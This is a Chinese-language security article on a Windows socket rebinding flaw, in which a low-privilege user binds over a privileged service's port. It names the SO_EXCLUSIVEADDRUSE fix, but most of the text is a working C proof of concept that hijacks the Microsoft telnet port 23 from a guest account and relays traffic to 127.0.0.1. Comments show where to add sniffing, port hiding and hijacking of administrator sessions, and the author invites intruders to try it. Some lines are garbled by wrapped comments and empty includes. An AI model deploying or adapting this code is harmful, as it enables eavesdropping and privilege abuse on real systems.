在WINDOWS的SOCKET服務(wù)器應(yīng)用的編程中,如下的語句或許比比都是:
s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = htonl(INADDR_ANY);
bind(s,(SOCKADDR *)&saddr,sizeof(saddr));
其實這當(dāng)中存在在非常大的安全隱患,因為在winsock的實現(xiàn)中,對于服務(wù)器的綁定是可以多重綁定的,在確定多重綁定使用誰的時候,根據(jù)一條原則是誰的指定最明確則將包遞交給誰,而且沒有權(quán)限之分,也就是說低級權(quán)限的用戶是可以重綁定在高級權(quán)限如服務(wù)啟動的端口上的,這是非常重大的一個安全隱患。
這意味著什么?意味著可以進行如下的攻擊:
1。一個木馬綁定到一個已經(jīng)合法存在的端口上進行端口的隱藏,他通過自己特定的包格式判斷是不是自己的包,如果是自己處理,如果不是通過127.0.0.1的地址交給真正的服務(wù)器應(yīng)用進行處理。
2。一個木馬可以在低權(quán)限用戶上綁定高權(quán)限的服務(wù)應(yīng)用的端口,進行該處理信息的嗅探,本來在一個主機上監(jiān)聽一個SOCKET的通訊需要具備非常高的權(quán)限要求,但其實利用SOCKET重綁定,你可以輕易的監(jiān)聽具備這種SOCKET編程漏洞的通訊,而無須采用什么掛接,鉤子或低層的驅(qū)動技術(shù)(這些都需要具備管理員權(quán)限才能達到)
3。針對一些的特殊應(yīng)用,可以發(fā)起中間人攻擊,從低權(quán)限用戶上獲得信息或事實欺騙,如在guest權(quán)限下攔截telnet服務(wù)器的23端口,如果是采用NTLM加密認證,雖然你無法通過嗅探直接獲取密碼,但一旦有admin用戶通過你登陸以后,你的應(yīng)用就完全可以發(fā)起中間人攻擊,扮演這個登陸的用戶通過SOCKET發(fā)送高權(quán)限的命令,到達入侵的目的。
4.對于構(gòu)建的WEB服務(wù)器,入侵者只需要獲得低級的權(quán)限,就可以完全達到更改網(wǎng)頁目的,很簡單,扮演你的服務(wù)器給予連接請求以其他信息的應(yīng)答,甚至是基于電子商務(wù)上的欺騙,獲取非法的數(shù)據(jù)。
其實,MS自己的很多服務(wù)的SOCKET編程都存在這樣的問題,telnet,ftp,http的服務(wù)實現(xiàn)全部都可以利用這種方法進行攻擊,在低權(quán)限用戶上實現(xiàn)對SYSTEM應(yīng)用的截聽。包括W2K+SP3的IIS也都一樣,那么如果你已經(jīng)可以以低權(quán)限用戶入侵或木馬植入的話,而且對方又開啟了這些服務(wù)的話,那就不妨一試。并且我估計還有很多第三方的服務(wù)也大多存在這個漏洞。
解決的方法很簡單,在編寫如上應(yīng)用的時候,綁定前需要使用setsockopt指定SO_EXCLUSIVEADDRUSE要求獨占所有的端口地址,而不允許復(fù)用。這樣其他人就無法復(fù)用這個端口了。
下面就是一個簡單的截聽ms telnet服務(wù)器的例子,在GUEST用戶下都能成功進行截聽,剩余的就是大家根據(jù)自己的需要,進行一些特殊剪裁的問題了:如是隱藏,嗅探數(shù)據(jù),高權(quán)限用戶欺騙等。
#include
#include
#include
#include
DWORD WINAPI ClientThread(LPVOID lpParam);
int main()
{
WORD wVersionRequested;
DWORD ret;
WSADATA wsaData;
BOOL val;
SOCKADDR_IN saddr;
SOCKADDR_IN scaddr;
int err;
SOCKET s;
SOCKET sc;
int caddsize;
HANDLE mt;
DWORD tid;
wVersionRequested = MAKEWORD( 2, 2 );
err = WSAStartup( wVersionRequested, &wsaData );
if ( err != 0 ) {
printf("error!WSAStartup failed!\n");
return -1;
}
saddr.sin_family = AF_INET;
//截聽雖然也可以將地址指定為INADDR_ANY,但是要不能影響正常應(yīng)用情況下,
應(yīng)該指定具體的IP,留下127.0.0.1給正常的服務(wù)應(yīng)用,然后利用這個地址進行轉(zhuǎn)發(fā),
就可以不影響對方正常應(yīng)用了
saddr.sin_addr.s_addr = inet_addr("192.168.0.60");
saddr.sin_port = htons(23);
if((s=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
printf("error!socket failed!\n");
return -1;
}
val = TRUE;
//SO_REUSEADDR選項就是可以實現(xiàn)端口重綁定的
if(setsockopt(s,SOL_SOCKET,SO_REUSEADDR,(char *)&val,sizeof(val))!=0)
{
printf("error!setsockopt failed!\n");
return -1;
}
//如果指定了SO_EXCLUSIVEADDRUSE,就不會綁定成功,返回?zé)o權(quán)限的錯誤代碼;
//如果是想通過重利用端口達到隱藏的目的,
就可以動態(tài)的測試當(dāng)前已綁定的端口哪個可以成功,
就說明具備這個漏洞,然后動態(tài)利用端口使得更隱蔽
//其實UDP端口一樣可以這樣重綁定利用,這兒主要是以TELNET服務(wù)為例子進行攻擊
if(bind(s,(SOCKADDR *)&saddr,sizeof(saddr))==SOCKET_ERROR)
{
ret=GetLastError();
printf("error!bind failed!\n");
return -1;
}
listen(s,2);
while(1)
{
caddsize = sizeof(scaddr);
//接受連接請求
sc = accept(s,(struct sockaddr *)&scaddr,&caddsize);
if(sc!=INVALID_SOCKET)
{
mt = CreateThread(NULL,0,ClientThread,(LPVOID)sc,0,&tid);
if(mt==NULL)
{
printf("Thread Creat Failed!\n");
break;
}
}
CloseHandle(mt);
}
closesocket(s);
WSACleanup();
return 0;
}
DWORD WINAPI ClientThread(LPVOID lpParam)
{
SOCKET ss = (SOCKET)lpParam;
SOCKET sc;
unsigned char buf[4096];
SOCKADDR_IN saddr;
long num;
DWORD val;
DWORD ret;
//如果是隱藏端口應(yīng)用的話,可以在此處加一些判斷
//如果是自己的包,就可以進行一些特殊處理,不是的話通過127.0.0.1進行轉(zhuǎn)發(fā)
saddr.sin_family = AF_INET;
saddr.sin_addr.s_addr = inet_addr("127.0.0.1");
saddr.sin_port = htons(23);
if((sc=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==SOCKET_ERROR)
{
printf("error!socket failed!\n");
return -1;
}
val = 100;
if(setsockopt(sc,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
{
ret = GetLastError();
return -1;
}
if(setsockopt(ss,SOL_SOCKET,SO_RCVTIMEO,(char *)&val,sizeof(val))!=0)
{
ret = GetLastError();
return -1;
}
if(connect(sc,(SOCKADDR *)&saddr,sizeof(saddr))!=0)
{
printf("error!socket connect failed!\n");
closesocket(sc);
closesocket(ss);
return -1;
}
while(1)
{
//下面的代碼主要是實現(xiàn)通過127。0。0。1這個地址把包轉(zhuǎn)發(fā)到真正的應(yīng)用上,
并把應(yīng)答的包再轉(zhuǎn)發(fā)回去。
//如果是嗅探內(nèi)容的話,可以再此處進行內(nèi)容分析和記錄
//如果是攻擊如TELNET服務(wù)器,利用其高權(quán)限登陸用戶的話,
可以分析其登陸用戶,然后利用發(fā)送特定的包以劫持的用戶身份執(zhí)行。
num = recv(ss,buf,4096,0);
if(num>0)
send(sc,buf,num,0);
else if(num==0)
break;
num = recv(sc,buf,4096,0);
if(num>0)
send(ss,buf,num,0);
else if(num==0)
break;
}
closesocket(ss);
closesocket(sc);
return 0 ;
}
